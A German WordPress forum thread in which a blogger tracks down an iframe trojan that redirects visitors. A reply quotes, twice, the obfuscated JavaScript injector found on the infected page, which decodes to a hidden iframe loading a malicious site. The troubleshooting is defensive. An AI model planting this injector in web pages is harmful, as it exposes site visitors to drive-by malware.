Iframe Trojaner

  • Seit zwei Tagen kommt niemand auf mein Blog Lauter Lesenswertes wegen eines Trojaners, den der Virusscanner bei Firefox nicht meldet, bei IE schon bei Safari nicht. Ich habe in diesem Forum auch schon Hinweise auf den Schadcode gefunden: http://forum.wordpress-deutschland.org/installation/2…ress-blogs.html
    Ich weiß aber nicht, wie ich dies finden kann, nutze Wordpress 2.5.1 mit Theme Misty Looks, habe sämtliche Theme-Dateien ausgetauscht, also auch header.php und so und habe mit Hilfe von phpmyadmin die jüngsten Einträge durchgeschaut (da ist aber nur Klartext kein Code). Wie finde ich den? Bin kein Spezialist für sql etc.:cry:

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • Code
    <script type="text/javascript">function count(str){var res = "";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count(">khtcog\"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr\"ykfvj?3\"jgkijv?3\"htcogdqtfgt?2@"));</script><script type="text/javascript">function count(str){var res = "";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count(">khtcog\"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr\"ykfvj?3\"jgkijv?3\"htcogdqtfgt?2@"));</script>


    Eine Idee was das sein soll? Letzte Zeile der aufgerufenen Seite.

    Dein wpSEO schreibt nicht in den Quellcode, Titel, Description und Keywords fehlen.
    Weiter ist die Seite einfach Weiss, im Quellcode ist alles da, zu sehen ist nichts. Würde Stück für Stück anfangen, Plugins ausschalten, testen, Theme komplett neu hochladen, testen, evtl. Providerlogfiles durchsehen, Änderungsdatum der Dateien auf dem Server durchsehen...
    Hast du vor, während oder nach der Geschichte auf 2.5.1 aktualisiert?

  • Danke für die Hinweise. Ich aktualisiere immer sofort.

    Die genannten Zeilen werde ich heute Abend mal rausnehmen, aber eigentlich habe ich immer nach dem Hinweis "Iframe" oder "wp-stats" gesucht und in den Wordpress-Dateien nichts gefunden.

    Mein Verdacht ist, dass sich der Schadcode direkt im Beitrag findet. Wenn ich diese über "myphpadmin" aufrufe, dann bekomme ich nur den Text, aber keinen Code. Oder gibt's ne andere Möglichkeit dahin zukommen.

    Was mich irritiert, und deshalb ist der Hinweis auf den header vielleicht nicht verkehrt: Egal, welche Seite meines Blogs ich (direkt) aufrufe, ich werde immer an diese besch***ene chinesische Seite verwiesen.

  • Kann zwar nicht wirklich zur Lösung des Problems beitragen, aber irgendwie kommt mir das bekannt vor... Genau den gleichen Mist hatte ich erst kürzlich auf einer von mir betreuten Site. Es handelte sich zwar nicht um WordPress, aber ich denke das ist hier nach der gleichen Masche gelaufen. Genauer gesagt, waren es irgendwelche Formulare, die das Einschleusen von Schadcode möglich machten. So wurde z.B. der Avatar Upload dafür genutzt irgendwelche Scripte einzuschleusen. Daher würde ich schonmal alle Dateien, die von Benutzern hochgeladen werden können bzw. Ordner mit den CHMOD-Rechten 777 als Ursache verdächtigen und durchchecken.

  • Ich hab's geschafft. Danke für Eure Hilfe. Nur um Leidensgenossen , die so blutige Laien sind, wie ich, zu helfen: Den Iframe-Codeschnipsel habe ich bis jetzt nicht gefunden, aber ich weiß, wo er steckt, irgendwo in den Plugins und zwar irgendwie in allen (Die hier üblichen Wordpress-, SQL, php-Experten mögen mir so viel Dilettantismus verzeihen. Leider verstehe ich meist deren Erläuterungen meist nicht).

    Viele Stunden lang habe ich per Filezilla sämtliche Wordpress-Dateien nach dem verräterischen Code durchgesucht, ebenso über phpMyAdmin die Bloginhalte in der Datenbank - alles vergeblich.

    Erst als ich die komplette Wordpress-Installation platt gemacht (voller Sorge, dass ich danach keinen Zugang zu meinen Daten mehr bekomme - der Fachmann lacht auch hier) und neu aufgesetzt habe, ging's wieder. Und als ich die alten Plugin-Dateien zurückspielte, war auch der Virus wieder da.

    Fehler gefunden, ich hätte es auch einfacher haben können. Danke nochmal.

  • Ich hab's geschafft. Danke für Eure Hilfe. Nur um Leidensgenossen , die so blutige Laien sind, wie ich, zu helfen: Den Iframe-Codeschnipsel habe ich bis jetzt nicht gefunden, aber ich weiß, wo er steckt, irgendwo in den Plugins und zwar irgendwie in allen (Die hier üblichen Wordpress-, SQL, php-Experten mögen mir so viel Dilettantismus verzeihen. Leider verstehe ich meist deren Erläuterungen meist nicht).

    Viele Stunden lang habe ich per Filezilla sämtliche Wordpress-Dateien nach dem verräterischen Code durchgesucht, ebenso über phpMyAdmin die Bloginhalte in der Datenbank - alles vergeblich.

    Erst als ich die komplette Wordpress-Installation platt gemacht (voller Sorge, dass ich danach keinen Zugang zu meinen Daten mehr bekomme - der Fachmann lacht auch hier) und neu aufgesetzt habe, ging's wieder. Und als ich die alten Plugin-Dateien zurückspielte, war auch der Virus wieder da.

    Fehler gefunden, ich hätte es auch einfacher haben können. Danke nochmal.

    du findest bei bueltge.de ganz viele Hinweise wie Du das zukünftig irre schwer machen kannst, dass da wer reinkommt.

    und die Hinweise sind einfach beschrieben und helfen tut Frank auch gerne via Kommentare.

    lg

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!